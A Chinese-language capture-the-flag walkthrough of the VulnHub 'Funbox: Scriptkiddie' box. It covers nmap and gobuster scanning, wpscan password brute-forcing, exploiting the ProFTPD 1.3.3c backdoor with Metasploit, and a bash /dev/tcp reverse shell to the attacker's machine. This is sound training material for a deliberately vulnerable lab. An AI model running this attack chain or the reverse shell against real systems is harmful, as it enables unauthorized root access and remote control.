vulnhub--Funbox: Scriptkiddie

靶机介绍

Difficult: As always, it’s a very easy box for beginners.

Goal: Get flag

Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/

信息探测

主机发现

netdiscover -i eth0 -r 192.168.0.128/24

vulnhub--Funbox: Scriptkiddie_第1张图片

端口扫描

nmap -sV -p- -A 192.168.0.131

vulnhub--Funbox: Scriptkiddie_第2张图片

nmap扫描结果

  • 并不能用 anonymous 访问FTP服务,这里就不进行FTP的暴力破解了;
  • 网站是用WordPress搭建的,可以使用wpscan进行检测,可以进行用户名和密码的枚举

添加hosts

由于靶机作者提示了 Add to your /etc/hosts: funbox11,因此将内容添加至hosts文件中

vulnhub--Funbox: Scriptkiddie_第3张图片

目录扫描

gobuster dir -u http://funbox11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "php,txt,zip,html" -t 200

vulnhub--Funbox: Scriptkiddie_第4张图片

获取网站Webshell

访问网站主页

vulnhub--Funbox: Scriptkiddie_第5张图片

使用wpscan 进行用户名和密码的枚举

枚举用户名

wpscan --url http://funbox11/ --enumerate u

vulnhub--Funbox: Scriptkiddie_第6张图片

枚举密码

wpscan --url http://funbox11/ --passwords /usr/share/wordlists/rockyou.txt --usernames admin -t 5

时间有点久,也可能爆破不出来,就不爆破了

ProFTPD 1.3.3c 后门命令执行漏洞

在端口扫描中可以得知FTP 服务使用的版本是 ProFTPD 1.3.3c,这个版本存在命令执行漏洞,在kali中寻找exp

searchsploit proftpd

vulnhub--Funbox: Scriptkiddie_第7张图片

有一个metasploit版本的exp

metasploit执行漏洞

use exploit/unix/ftp/proftpd_133c_backdoor
show options
set RHOSTS 192.168.0.131  
show payloads
set payload payload/cmd/unix/reverse 
show options
set LHOST 192.168.0.128
exploit

vulnhub--Funbox: Scriptkiddie_第8张图片

得到的是一个root权限,在这里可以直接得到flag,也可以通过执行一个反弹shell来得到一个连接

vulnhub--Funbox: Scriptkiddie_第9张图片

执行反弹shell

开启一个监听

vulnhub--Funbox: Scriptkiddie_第10张图片

在metasploit中执行

bash -c 'bash -i >& /dev/tcp/192.168.0.128/9001 0>&1'

得到连接

vulnhub--Funbox: Scriptkiddie_第11张图片

得到flag

vulnhub--Funbox: Scriptkiddie_第12张图片

总结

  • nmap扫描
  • wpscan
  • ProFTPD-1.3.3c 漏洞

你可能感兴趣的:(vulnhub靶机测试,安全,ftp)